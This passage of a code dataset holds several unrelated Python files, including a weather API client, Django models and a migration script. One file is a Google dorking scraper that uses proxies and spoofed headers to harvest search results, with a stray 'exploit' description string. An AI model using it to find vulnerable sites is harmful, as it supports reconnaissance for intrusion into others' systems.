(\"uni1E0D\", \"dr\"), (\"uni1E36\", \"lr\"), (\"uni1E37\", \"lr\"), (\"uni1E46\", \"nr\"), (\"uni1E47\", \"nr\"), (\"uni1E62\", \"cr\"), (\"uni1E63\", \"cr\"), (\"uni1E6C\", \"tr\"), (\"uni1E6D\", \"tr\"), (\"Aacute\", \"aa\"), (\"aacute\", \"aa\"), (\"Iacute\", \"ii\"), (\"iacute\", \"ii\"), (\"Uacute\", \"uu\"), (\"uacute\", \"uu\")]:\n font[el[0]].addReference(\"bhat_%s\" % el[1]);\n\n\n for cns in map(lambda x: 
(list(x), x),[\"t\", \"k\", \"x\", \"s\", \"n\", \"m\", \"d\", \"g\", \"p\", \"b\", \"h\", \"c\", \"z\", \"l\", \"r\", \"j\", \"y\", \"w\", \"dh\", \"kh\", \"gh\", \"ph\", \"bh\", ]) + [([\"uni1E0C\"], \"dr\"), ([\"uni1E0D\"], \"dr\"), ([\"uni1E36\"], \"lr\"), ([\"uni1E37\"], \"lr\"), ([\"uni1E46\"], \"nr\"), ([\"uni1E47\"], \"nr\"), ([\"uni1E62\"], \"cr\"), ([\"uni1E63\"], \"cr\"), ([\"uni1E6C\"], \"tr\"), ([\"uni1E6D\"], \"tr\")]:\n for vwl in map(lambda x: (list(x), x), [\"a\", \"i\", \"u\", \"e\", \"o\", \"ai\", \"au\"]) + [([\"Aacute\"], \"aa\"), ([\"aacute\"], \"aa\"), ([\"Iacute\"], \"ii\"), ([\"iacute\"], \"ii\"), ([\"Uacute\"], \"uu\"), ([\"uacute\"], \"uu\")]:\n syl = cns[1] + vwl[1];\n lst = cns[0] + vwl[0];\n font[\"bhat_%s\" % syl].addPosSub(\"ligature1-1\", lst);\n\n all_composed = \" \".join(\n reduce(lambda x, y: x+y,\n map(lambda v:\n map(lambda c: \"bhat_%s%s\" % (c, v), [\"\", \"t\", \"k\", \"x\", \"s\", \"n\", \"m\", \"d\", \"g\", \"p\", \"b\", \"h\", \"c\", \"z\", \"l\", \"r\", \"j\", \"y\", \"w\", \"dh\", \"kh\", \"gh\", \"ph\", \"bh\", \"tr\", \"dr\", \"nr\", \"lr\", \"cr\"]), [\"a\", \"i\", \"u\", \"aa\", \"ii\", \"uu\", \"e\", \"o\", \"ai\", \"au\", \"\"]))\n + [\"a\", \"i\", \"u\", \"e\", \"o\", \"t\", \"k\", \"x\", \"s\", \"n\", \"m\", \"d\", \"g\", \"p\", \"b\", \"h\", \"c\", \"z\", \"l\", \"r\", \"j\", \"y\", \"w\"]\n + map(lambda x: x.upper(), [\"a\", \"i\", \"u\", \"e\", \"o\", \"t\", \"k\", \"x\", \"s\", \"n\", \"m\", \"d\", \"g\", \"p\", \"b\", \"h\", \"c\", \"z\", \"l\", \"r\", \"j\", \"y\", \"w\"])\n + [\"uni1E0C\", \"uni1E0D\", \"uni1E36\", \"uni1E37\", \"uni1E46\", \"uni1E47\", \"uni1E62\", \"uni1E63\", \"uni1E6C\", \"uni1E6D\", \"Aacute\", \"aacute\", \"Iacute\", \"iacute\", \"Uacute\", \"uacute\"]\n );\n \n font.addLookup(\"kerning1\", \"gpos_pair\", (), ((\"kern\",((\"dflt\",(\"dflt\")), (\"latn\",(\"dflt\")))),));\n font.addKerningClass(\"kerning1\", \"kerning1-1\", [all_composed], [[], all_composed], [0, -100]);\n\n for cp in font:\n font[cp].right_side_bearing = 0;\n font[cp].left_side_bearing = 0;\n\n font[\"space\"].width = 200;\n\n \n\n\ndef main():\n font = fontforge.font();\n name = \"BhataanTransliteration\"\n\n font.fullname = name;\n font.fontname = name;\n font.familyname = name;\n\n font.encoding = \"UnicodeBmp\";\n\n create_characters(font);\n create(font);\n \n font.save(\"%s.sfd\" % name);\n font.generate(\"%s.ttf\" % name);\n font.generate(\"%s.woff\" % name);\n\nmain();\n\n","repo_name":"Haar-you/BhaataanFont","sub_path":"fonts/high-contrast/Transliteration/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":6277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"37894010711","text":"import requests\nfrom typing import Dict, Any, Tuple\nfrom datetime import datetime, timedelta\nfrom json import loads\n\n#https://openweathermap.org/current\n#https://openweathermap.org/forecast5\n#https://open-meteo.com/en/docs/historical-weather-api\n#https://openweathermap.org/api/geocoding-api\nclass OpenWeatherCaller:\n try:\n with open(\"ll_web/weather_api/default_key.json\", \"r\") as f:\n api_key = loads(f.read())[\"api_key\"]\n except:\n pass\n\n def __init__(self, location: Tuple[float, float], date: str, api_key:str, range: Tuple[str, str] = None) -> None:\n #Set default values used for API calls\n self.api_key = api_key\n self.date = date\n self.range = range\n self.api_key = api_key if api_key else OpenWeatherCaller.api_key\n self.location = location\n\n def 
get_location(self, str_location) -> Tuple[float, float]:\n #Currently unused and untested, found to be unaccurate\n response = requests.get(f\"https://api.openweathermap.org/geo/1.0/direct?q={str_location[0]}&limit=5&appid={self.api_key}\")\n response.raise_for_status()\n response = response.json()\n self.location = (response[0][\"lat\"], response[0][\"lon\"])\n return\n\n def __restructure_openmeteo(self):\n #Restructures the response from open-meteo to match the openweathermap format\n\n formatted_days = []\n dayly = self.response['daily']\n formatted_hours = []\n #self.response['longitude']\n #For every day (in db master) ad a properly formatted day to the list\n for (time, max_temp, min_temp, sunrise, sunset, rainsum, snowsum) in\\\n zip(dayly['time'], dayly['temperature_2m_max'], dayly['temperature_2m_min'], dayly['sunrise'],\\\n dayly['sunset'], dayly['rain_sum'], dayly['snowfall_sum']):\n formatted_days.append(\\\n {'coord': \n {'lat': self.location[0], 'lon': self.location[1]},\n \n 'weather': [{}],\n 'base': 'unknown',\n 'main': {\n 'temp_min': min_temp,\n 'temp_max': max_temp,\n },\n 'visibility': 'Unknown',\n 'wind': {},\n 'rain': {'sum': rainsum},\n 'snow': {'sum': snowsum},\n 'dt': time,\n 'sys': {\n 'sunrise': sunrise,\n 'sunset': sunset,\n },\n 'name': 'unknown',\n \"source\": \"open-meteo\",\n })\n formatted_hours.append({'list': []})\n\n #For every hour (in db slave) add a properly formatted hour to the list\n hourly = self.response['hourly']\n day = 0\n for (time, temperature_2m, relativehumidity_2m, apparent_temperature, rain, snowfall, weathercode, pressure_msl,\\\n surface_pressure, windspeed_10m, winddirection_10m, windgusts_10m) in zip(hourly['time'], hourly['temperature_2m'],\\\n hourly['relativehumidity_2m'], hourly['apparent_temperature'], hourly['rain'], hourly['snowfall'], hourly['weathercode'],\\\n hourly['pressure_msl'], hourly['surface_pressure'], hourly['windspeed_10m'], hourly['winddirection_10m'], hourly['windgusts_10m']):\n \n if not len(formatted_days) == day+1 and time >= formatted_days[day +1]['dt']:\n day += 1\n \n formatted_hours[day]['list'].append(\n {\n 'dt': time,\n 'main': {\n 'temp': temperature_2m,\n 'feels_like': apparent_temperature,\n 'humidity': relativehumidity_2m,\n 'sea_level': pressure_msl,\n 'grnd_level': surface_pressure,\n },\n 'weather': [\n {\n 'id': weathercode,\n }\n ],\n \"clouds\": {},\n \"wind\": {\n \"speed\": windspeed_10m,\n \"deg\": winddirection_10m,\n \"gust\": windgusts_10m,\n },\n \"visibility\": \"unknown\",\n \"pop\": None,\n \"rain\": {\n \"1h\": rain,\n },\n \"snow\": {\n \"1h\": snowfall,\n },\n \"sys\": {\n \"sunrise\": formatted_days[day][\"sys\"][\"sunrise\"],\n \"sunset\": formatted_days[day][\"sys\"][\"sunset\"],\n },\n \"source\": \"open-meteo\",\n }\n )\n #Return the formatted response\n return {'daily': formatted_days, 'hourly': formatted_hours}\n \n \n\n def __get_current_weather(self) -> Dict[str, Any]:\n #Calls openweathermap API for current weather, no additional information needed\n response = requests.get(f\"https://api.openweathermap.org/data/2.5/weather?lat={self.location[0]}&lon={self.location[1]}&units=metric&appid={self.api_key}\")\n response.raise_for_status()\n return response.json()\n\n def __get_forecast_weather(self) -> Dict[str, Any]:\n #Calls openweathermap API for forecast weather, no additional information needed\n response = requests.get(f\"https://api.openweathermap.org/data/2.5/forecast?lat={self.location[0]}&lon={self.location[1]}&units=metric&appid={self.api_key}\")\n 
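# Raise early on HTTP errors before parsing the geocoding payload below.\n        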
response.raise_for_status()\n return response.json()\n\n def __get_historical_weather(self) -> Dict[str, Any]:\n #Calls open-meteo API for historical weather, needs a a time range\n #And restructures the response to match the openweathermap format\n response = requests.get(f\"https://archive-api.open-meteo.com/v1/archive?latitude={self.location[0]}&longitude={self.location[1]}&start_date={self.range[0]}&end_date={self.range[1]}&hourly=temperature_2m,relativehumidity_2m,apparent_temperature,rain,snowfall,weathercode,pressure_msl,surface_pressure,windspeed_10m,winddirection_10m,windgusts_10m&daily=temperature_2m_max,temperature_2m_min,sunrise,sunset,rain_sum,snowfall_sum&timeformat=unixtime&timezone=GMT\")\n response.raise_for_status()\n self.response = response.json()\n return self.__restructure_openmeteo()\n\n def get_weather(self):\n #Selects the correct API call based on the date, returns the response\n if self.date == \"now\":\n return self.__get_current_weather()\n elif self.date == \"forecast\":\n return self.__get_forecast_weather()\n else:\n return self.__get_historical_weather()\n'https://archive-api.open-meteo.com/v1/archive?latitude=53.5453&longitude=9.9953&start_date=2023-09-19&end_date=2023-09-23&hourly=temperature_2m,relativehumidity_2m,apparent_temperature,rain,snowfall,weathercode,pressure_msl,surface_pressure,windspeed_10m,winddirection_10m,windgusts_10m&daily=temperature_2m_max,temperature_2m_min,sunrise,sunset,rain_sum,snowfall_sum&timeformat=unixtime&Europe%2FBerlin'","repo_name":"Katzenkralle/link_list","sub_path":"ll_web/weather_api/open_weather_caller.py","file_name":"open_weather_caller.py","file_ext":"py","file_size_in_byte":7123,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"6090140545","text":"# -*- coding: utf-8 -*-\nfrom orangengine.drivers import JuniperSRXDriver\nfrom orangengine.drivers import PaloAltoPanoramaDriver\n\n\nDRIVER_MAPPINGS = {\n 'juniper_srx': JuniperSRXDriver,\n 'palo_alto_panorama': PaloAltoPanoramaDriver,\n}\n\nplatforms = list(DRIVER_MAPPINGS.keys())\n\n\ndef dispatch(*args, **kwargs):\n \"\"\"driver connection factory\"\"\"\n\n if kwargs['device_type'] not in platforms:\n raise ValueError('Platform is not currently supported.')\n\n Driver = DRIVER_MAPPINGS[kwargs['device_type']]\n return Driver(*args, **kwargs)\n","repo_name":"lampwins/orangengine","sub_path":"orangengine/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"79"} +{"seq_id":"6932605512","text":"from opcoes import number_to_string\nimport sys\n\nif __name__ == \"__main__\":\n sys.setrecursionlimit(11000)\n sair = 1\n while sair!=0:\n op = input(\"Digite a opcao desejada:\\n1-Merge Sort\\n0-Sair\\nResposta:\")\n op = int(op)\n sair = op\n number_to_string(op)","repo_name":"yarion1/Trabalho-PAA-","sub_path":"Merge sort/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"13873402782","text":"from rest_framework.generics import ListAPIView, RetrieveAPIView\nfrom .models import Mobile\nfrom .serializers import MobileSerializer\n\n\nclass SuggestMobileView(ListAPIView):\n serializer_class = MobileSerializer\n\n def get_queryset(self):\n min_price = self.request.GET.get('min_price', None)\n max_price = self.request.GET.get('max_price', None)\n min_date = 
self.request.GET.get('min_date', None)\n max_date = self.request.GET.get('max_date', None)\n queryset = Mobile.objects.all()\n\n if max_price:\n queryset = queryset.filter(price__lte=max_price)\n if min_price:\n queryset = queryset.filter(price__gte=min_price)\n if max_date:\n queryset = queryset.filter(production_date__lte=max_date)\n if min_date:\n queryset = queryset.filter(production_date__gte=min_date)\n\n if self.request.user.is_anonymous:\n return queryset[:1]\n\n return queryset\n\n\n","repo_name":"mohammadsaleh81/mobo_suggest","sub_path":"product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9094695787","text":"import email\r\nfrom email import message\r\nfrom django.db import models\r\n\r\n# Create your models here.\r\nclass Animal(models.Model):\r\n SPECIE_CHOICES = (\r\n ('mammal', 'Mammal'),\r\n ('amphibian', 'Amphibian'),\r\n ('reptile', 'Reptile'),\r\n ('pices', 'Pices'),\r\n ('aves', 'Aves')\r\n )\r\n\r\n name = models.CharField(max_length=200, unique=True)\r\n desc = models.TextField()\r\n dob = models.DateField()\r\n specie = models.CharField(max_length=200, choices=SPECIE_CHOICES)\r\n population = models.IntegerField(default=0)\r\n is_extinct = models.BooleanField()\r\n pic_url = models.URLField()\r\n date_created =models.DateTimeField(auto_now_add=True)\r\n date_updated = models.DateTimeField(auto_now=True)\r\n viewing_price =models.FloatField(default=0)\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\nclass Contact(models.Model):\r\n name = models.CharField(max_length=50)\r\n email = models.CharField(max_length=50)\r\n message = models.TextField(max_length=200)\r\n\r\n # def contact_us(request):\r\n # if request.method==\"POST\":\r\n # request_data = dict(request.POST)\r\n # request_data.pop('csrfmiddlewaretoken')\r\n # data = {key:request_data.get(key)[0] for key in request_data}\r\n # print(data)\r\n def __str__(self):\r\n return self.name","repo_name":"Udokaamos/web-app","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42538890131","text":"import json\nimport os\nfrom time import sleep\nfrom urllib.parse import urlparse\nfrom bs4 import BeautifulSoup\nimport requests\nimport argparse\n\n\ndef main(queries: list, no_filter: False, max_pages: 100, sleep_per_page: 60, output_path=\"output.json\", socks5_proxy={}):\n print(f\"[•] Scan starting with settings: Max pages: {max_pages}, Sleep per page: {sleep_per_page}, Disable filter: \"+(\"Yes\" if no_filter else \"No\")+\".\")\n\n for input in queries:\n query = input.replace(\" \", \"+\")\n print(f\"[@] Dorking \\\"{input}\\\"...\")\n get_page_results(href=f\"https://www.google.com/search?q={query}&oq={query}&sourceid=chrome&ie=UTF-8&num=\"+str(max_pages+2)+(\"&filter=0\" if no_filter else \"\"), output_path=output_path, sleep_per_page=sleep_per_page, proxies=socks5_proxy)\n sleep(sleep_per_page)\n\n print(\"[√] Done.\")\n\n\ndef get_page_results(href, output_path, sleep_per_page=60, proxies={}):\n\n # Get contents\n response = requests.get(\n url=href, \n headers={\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36\",\n \"Cache-Control\": \"max-age=0\",\n \"sec-ch-ua\": \"\\\"Chromium\\\";v=\\\"106\\\", \\\"Google Chrome\\\";v=\\\"106\\\", 
\\\"Not;A=Brand\\\";v=\\\"99\\\"\",\n \"sec-ch-ua-mobile\": \"?0\",\n \"sec-ch-ua-platform\": \"\\\"macOS\\\"\",\n \"sec-fetch-dest\": \"iframe\",\n \"sec-fetch-mode\": \"navigate\",\n \"sec-fetch-site\": \"same-site\",\n \"upgrade-insecure-requests\": \"1\",\n \"referer\": \"https://www.google.com/\"\n },\n allow_redirects=True,\n proxies=proxies\n )\n\n if response.status_code == 429:\n print(f\"[!] You are sending too many requests. Waiting {(sleep_per_page * 3)} seconds for next request...\")\n sleep(sleep_per_page * 3)\n print(\"[•] Sleep over. Trying again...\")\n get_page_results(href=href, output_path=output_path)\n return\n\n # Parse contents\n parsed = urlparse(response.url)\n soup = BeautifulSoup(response.text, \"html.parser\")\n\n total = 0\n\n # Get search results\n result_block = soup.find_all(\"div\", attrs={\"class\": \"g\"})\n print(f\"[√] Found {len(result_block)} potential links.\")\n for result in result_block:\n link = result.find(\"a\", href=True)\n success = output_link(link=link['href'], output_path=output_path)\n if success:\n total += 1\n\n print(f\"[√] Found {total} fresh discovered links.\")\n\n # Next page if possible\n current_page = soup.select_one(\"#botstuff [role='navigation'] td:not(:has(a))\")\n next_btn = soup.find(\"a\", attrs={\"id\": \"pnnext\"})\n\n if next_btn:\n if current_page and current_page.text:\n print(f\"[•] Next page {int(current_page.text) + 1}...\")\n else:\n print(f\"[•] Next page...\")\n\n sleep(sleep_per_page)\n\n get_page_results(href=f\"{parsed.scheme}://{parsed.netloc}{next_btn['href']}\", output_path=output_path)\n\n\ndef output_link(link, output_path):\n if os.path.exists(output_path):\n # Read\n output_file = open(output_path, \"r\")\n output_content = output_file.read()\n output_arr = json.loads(output_content)\n output_file.close()\n else:\n output_arr = []\n\n if not link.startswith(\"https://\") and not link.startswith(\"http://\"):\n return\n\n # Add result to list\n if link not in output_arr:\n output_arr.append(link)\n\n # Write\n output_file = open(output_path, \"w\")\n output_file.write(json.dumps(output_arr))\n output_file.close()\n\n return True\n\n\nif __name__ == \"__main__\":\n # Credits\n print(\"G-Dorker, a Python3 Google dorking tool\")\n print(\"[•] Made by: https://github.com/joshuavanderpoll/G-Dorker\")\n\n # Arguments\n parser = argparse.ArgumentParser(description='Exploit CVE-2021-3129 - Laravel vulnerability exploit script')\n parser.add_argument('--query', help='Query to search', required=False)\n parser.add_argument('--unfilter', help='Disables Google filter feature (Causes lot of duplicate sites)', required=False, default=False, action='store_true')\n parser.add_argument('--sleep', help='Amount of time to sleep per page', required=False, default=60, type=int)\n parser.add_argument('--pages', help='Request of results per request', required=False, default=25, type=int)\n parser.add_argument('--queries', help='Path to JSON list with queries', required=False)\n parser.add_argument('--output', help='Path to output JSON file', required=False, default=\"output.json\")\n \n parser.add_argument('--socks5-host', help='SOCKS5 HTTP/HTTPS Proxy host', required=False)\n parser.add_argument('--socks5-port', help='SOCKS5 HTTP/HTTPS Proxy port', required=False)\n parser.add_argument('--socks5-user', help='SOCKS5 HTTP/HTTPS Proxy username', required=False)\n parser.add_argument('--socks5-pwd', help='SOCKS5 HTTP/HTTPS Proxy password', required=False)\n\n args = parser.parse_args()\n proxies = {}\n\n # Check if valid 
execution\n if not args.queries and not args.query:\n print(\"[!] Please use the \\\"--query\\\" or \\\"--queries\\\" parameter.\")\n exit(1)\n\n # Get queries to dork\n queries = []\n if args.queries:\n if not os.path.exists(args.queries):\n print(f\"[!] Queries file \\\"{args.queries}\\\" does not exists\")\n exit(1)\n \n query_stream = open(args.queries, \"r\")\n queries = json.loads(query_stream.read())\n query_stream.close()\n else:\n queries.append(args.query)\n\n # Validate output path\n if os.path.exists(args.output):\n overwrite = input(f\"[?] The output file \\\"{args.output}\\\" already exists. Are you sure you want to append or overwrite this? (y/a/n) \").lower()\n if overwrite == \"y\":\n os.unlink(args.output)\n elif overwrite == \"a\":\n pass\n elif overwrite == \"n\":\n print(\"[!] Please you another \\\"--output\\\" path.\")\n exit(1)\n else:\n print(\"[!] Invalid response.\")\n exit(1)\n\n # Page validation\n if args.pages > 100:\n print(\"[!] Google only allows a maximum of 100 results per request. Change the \\\"--pages\\\" argument to a number below 100 to continue\")\n exit(1)\n\n # SOCKS5 Proxy validation\n if args.socks5_host:\n if not args.socks5_port:\n print(f\"[!] Please use the \\\"--socks5-port\\\" when using \\\"--socks5-host\\\".\")\n exit(1)\n \n if args.socks5_user and args.socks5_pwd:\n proxies = {\"http\": f\"{args.socks5_user}:{args.socks5_pwd}@{args.socks5_host}:{args.socks5_port}\", \"https\": f\"{args.socks5_user}:{args.socks5_pwd}@{args.socks5_host}:{args.socks5_port}\"}\n else:\n proxies = {\"http\": f\"{args.socks5_host}:{args.socks5_port}\", \"https\": f\"{args.socks5_host}:{args.socks5_port}\"}\n\n main(no_filter=args.unfilter, max_pages=args.pages, sleep_per_page=args.sleep, queries=queries, output_path=args.output, socks5_proxy=proxies)","repo_name":"joshuavanderpoll/G-Dorker","sub_path":"gdorker.py","file_name":"gdorker.py","file_ext":"py","file_size_in_byte":7038,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"17256389819","text":"from sklearn import linear_model\nimport numpy as np\n\n\ndef lossfit(entity):\n set_feature, set_target = get_features_target(entity)\n\n regs = {}\n for col in entity.df.columns:\n regs[col] = linear_model.LinearRegression()\n regs[col].fit(set_feature[col], set_target[col])\n\n for index, row in entity.df.iterrows():\n if not row.hasnans:\n continue\n col_lossy, features = get_lossy_features(row)\n if col_lossy is not None:\n est = regs[col_lossy].predict([features])\n entity.df[col_lossy][index] = est\n\n\ndef get_lossy_features(row):\n features = []\n col_lossy = None\n for col, val in row.iteritems():\n if np.isnan(val):\n if col_lossy is None:\n col_lossy = col\n else:\n return None, None\n else:\n features.append(val)\n\n return col_lossy, features\n\n\ndef get_features_target(entity):\n n_cols = len(entity.df.columns)\n set_feature = {}\n set_target = {}\n for col in entity.df.columns:\n set_feature[col] = []\n set_target[col] = []\n\n for index, row in entity.df.iterrows():\n if row.hasnans:\n continue\n\n set_feature[row.index[0]].append(row[1:])\n set_target[row.index[0]].append(row[0])\n\n for i in range(1, n_cols - 1):\n set_feature[row.index[i]].append(row[:i] + row[i + 1:])\n set_target[row.index[i]].append(row[i])\n\n set_feature[row.index[n_cols - 1]].append(row[:n_cols - 1])\n set_target[row.index[n_cols - 1]].append(row[n_cols - 1])\n\n return set_feature, 
set_target\n","repo_name":"yunyun3599/qufafeat","sub_path":"featuretools/entityset/lossfit.py","file_name":"lossfit.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"39923373610","text":"import heapq\ndef solution(operations):\n heap=[]\n for i in operations:\n op, n= i.split(\" \")\n if op==\"I\":\n heapq.heappush(heap,int(n))\n if i==\"D -1\" and heap:\n heapq.heappop(heap)\n if i==\"D 1\" and heap:\n heap=list(heap)\n heap.sort()\n heap.pop()\n heapq.heapify(heap)\n list(heap)\n if len(heap)>1:\n heap.sort()\n ma=heap[-1]\n mi=heap[0]\n return [ma,mi]\n elif len(heap)==1:\n return [heap[0],heap[0]]\n else:\n return [0,0]","repo_name":"ChoiYeongChan/BOJ","sub_path":"프로그래머스/lv3/42628. 이중우선순위큐/이중우선순위큐.py","file_name":"이중우선순위큐.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11337693107","text":"# %%\nimport sys\nimport yaml\nimport os\n\n# %%\n# Ensure that a command line argument is given (or the project is running in a Jupyter notebook)\ntry:\n ipy_str = str(type(get_ipython()))\n if 'zmqshell' in ipy_str or 'terminal' in ipy_str:\n # Running in Jupyter or iPython\n projectName = input(\"Enter project name: \")\nexcept:\n # Running in terminal\n if len(sys.argv) < 2:\n projectName = input(\"Enter project name: \")\n elif len(sys.argv) > 2:\n raise Exception(\"Too many command line arguments given\")\n else:\n projectName = sys.argv[1]\n\n# Import YAML configuration for project\ntry:\n scriptLocation = os.path.realpath(__file__)\n scriptDirectory = os.path.dirname(scriptLocation)\n\n projectStream = open(\"{scriptDirectory}/{projectName}/ProjectConfig.yaml\".format(scriptDirectory=scriptDirectory, projectName=projectName), 'r')\n projectConfig = yaml.safe_load(projectStream)\nexcept:\n raise Exception(\"Project configuration could not be opened\")\n\nfirmwareFolder = projectConfig['firmwareFolder']\nhdlFolder = projectConfig['hdlFolder']\n\n# %%\nfrom FoxNetwork import *\nfrom Firmware import *\nfrom FoxConfig import *\n\nconfig = FoxConfig(configFolder=projectName)\nconfig.import_network_config()\nconfig.import_firmware_config()\n\n# %%\nif config.foxFirmware is not None:\n foxFirmware = Firmware(name=config.foxFirmware, memSize=config.foxFirmwareMemSize)\n foxFirmware.write_assembly_file(firmwareFolder)\n foxFirmware.write_makefile_variables(firmwareFolder)\nelse:\n foxFirmware = None\n\nif config.resultFirmware is not None:\n resultFirmware = Firmware(name=config.resultFirmware, memSize=config.resultFirmwareMemSize)\n resultFirmware.write_assembly_file(firmwareFolder)\n resultFirmware.write_makefile_variables(firmwareFolder)\nelse:\n resultFirmware = None\n\n# %%\nfoxNetwork = FoxNetwork(networkRows=config.networkRows, \\\n networkCols=config.networkCols, \\\n resultNodeCoord=config.resultNodeCoord, \\\n romNodeCoord=config.romNodeCoord, \\\n totalMatrixSize=config.totalMatrixSize, \\\n foxNetworkStages=config.foxNetworkStages, \\\n multicastGroupBits=config.multicastGroupBits,\\\n multicastCoordBits=config.multicastCoordBits,\\\n readyFlagBits=config.readyFlagBits, \\\n resultFlagBits=config.resultFlagBits, \\\n matrixTypeBits=config.matrixTypeBits, \\\n matrixCoordBits=config.matrixCoordBits, \\\n foxFirmware=foxFirmware, \\\n resultFirmware=resultFirmware, \\\n A=A, \\\n B=B, \\\n useMatrixInitFile=config.useMatrixInitFile, \\\n multicastAvailable=config.multicastAvailable, \\\n 
useMulticast=config.useMulticast, \\\n multicastGroupNodes=config.multicastGroupNodes, \\\n multicastNetworkRows=config.multicastNetworkRows, \\\n multicastNetworkCols=config.multicastNetworkCols, \\\n multicastFifoDepth=config.multicastFifoDepth, \\\n foxNodeFifos=config.foxNodeFifos, \\\n resultNodeFifos=config.resultNodeFifos, \\\n resultUartFifoDepth=config.resultUartFifoDepth, \\\n hdlFolder=hdlFolder, \\\n firmwareFolder=firmwareFolder)\n\n# %%\nfoxNetwork.create_matrix_init_files()\n\n# %%\nfoxNetwork.write_packet_header_file()\n\n# %%\nfoxNetwork.write_network_header_file()\n\n# %%\nfoxNetwork.write_multicast_header_file()\n\n# %%\nfoxNetwork.write_matrix_config_file()\n\n# %%\nfoxNetwork.write_firmware_config_file()\n","repo_name":"hprice99/ENGG4811_code","sub_path":"scripts/fox_network_generate.py","file_name":"fox_network_generate.py","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6865414855","text":"\"\"\"migrate func keys with args\n\nRevision ID: dd0c465315d\nRevises: 4ce50bcf2a0e\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'dd0c465315d'\ndown_revision = '4ce50bcf2a0e'\n\nfrom alembic import op\nfrom sqlalchemy import sql\nimport sqlalchemy as sa\n\n\nTYPE_SPEEDDIAL = 'speeddial'\n\nDESTINATION_FORWARD_ID = 6\nDESTINATION_FORWARD_NAME = 'forward'\n\nFORWARD_TYPES = ('fwdrna',\n 'fwdbusy',\n 'fwdunc')\n\nphonefunckey_table = sql.table('phonefunckey',\n sql.column('iduserfeatures'),\n sql.column('fknum'),\n sql.column('exten'),\n sql.column('typeextenumbers'),\n sql.column('typevalextenumbers'),\n sql.column('typeextenumbersright'),\n sql.column('typevalextenumbersright'),\n sql.column('label'),\n sql.column('supervision'),\n sql.column('progfunckey'))\n\nfunc_key_table = sql.table('func_key',\n sql.column('id'),\n sql.column('type_id'),\n sql.column('destination_type_id'))\n\ndestination_forward_table = sql.table('func_key_dest_forward',\n sql.column('func_key_id'),\n sql.column('destination_type_id'),\n sql.column('extension_id'),\n sql.column('number'))\n\nfunc_key_type_table = sql.table('func_key_type',\n sql.column('id'),\n sql.column('name'))\n\nfunc_key_mapping_table = sql.table('func_key_mapping',\n sql.column('template_id'),\n sql.column('func_key_id'),\n sql.column('destination_type_id'),\n sql.column('label'),\n sql.column('position'),\n sql.column('blf'))\n\ntemplate_table = sql.table('func_key_template', sql.column('id'))\n\nextensions_table = sql.table('extensions',\n sql.column('id'),\n sql.column('commented'),\n sql.column('context'),\n sql.column('exten'),\n sql.column('type'),\n sql.column('typeval'))\n\nuser_table = sql.table('userfeatures',\n sql.column('id'),\n sql.column('func_key_private_template_id'))\n\ndestination_type_table = sql.table('func_key_destination_type',\n sql.column('id'),\n sql.column('name'))\n\n\nfunc_key_columns = (\n phonefunckey_table.c.iduserfeatures.label('user_id'),\n phonefunckey_table.c.fknum.label('position'),\n phonefunckey_table.c.label,\n phonefunckey_table.c.typevalextenumbers.label('extension_type'),\n phonefunckey_table.c.exten.label('number'),\n sql.cast(phonefunckey_table.c.supervision, sa.Boolean).label('blf'),\n)\n\nold_func_key_columns = (\n func_key_mapping_table.c.func_key_id,\n func_key_mapping_table.c.template_id,\n func_key_mapping_table.c.position,\n func_key_mapping_table.c.blf,\n func_key_mapping_table.c.label,\n destination_forward_table.c.extension_id,\n 
destination_forward_table.c.number,\n extensions_table.c.typeval,\n user_table.c.id.label('user_id')\n)\n\nfunc_keys_query = (sql.select(func_key_columns)\n .where(\n phonefunckey_table.c.typevalextenumbers.in_(FORWARD_TYPES)\n ))\n\n\nold_func_keys_query = (sql.select(old_func_key_columns,\n from_obj=[\n func_key_mapping_table.join(\n destination_forward_table,\n func_key_mapping_table.c.func_key_id == destination_forward_table.c.func_key_id)\n .join(extensions_table,\n destination_forward_table.c.extension_id == extensions_table.c.id)\n .join(template_table,\n func_key_mapping_table.c.template_id == template_table.c.id)\n .join(user_table,\n template_table.c.id == user_table.c.func_key_private_template_id)\n ]))\n\n\ndef upgrade():\n delete_duplicate_fks()\n migrate_func_keys()\n delete_old_func_keys()\n\n\ndef delete_duplicate_fks():\n for row in get_duplicate_func_keys():\n delete_duplicate_fk(row.iduserfeatures, row.typevalextenumbers, row.fknum)\n\n\ndef get_duplicate_func_keys():\n columns = (phonefunckey_table.c.iduserfeatures,\n phonefunckey_table.c.typevalextenumbers,\n sa.func.min(phonefunckey_table.c.fknum).label(\"first_position\"))\n\n valid_fk_subq = (sql.select(columns)\n .where(\n phonefunckey_table.c.typevalextenumbers.in_(FORWARD_TYPES))\n .group_by(\n phonefunckey_table.c.iduserfeatures,\n phonefunckey_table.c.typevalextenumbers)\n .having(\n sa.func.count(phonefunckey_table.c.typevalextenumbers) > 1)\n .alias())\n\n columns = (phonefunckey_table.c.iduserfeatures,\n 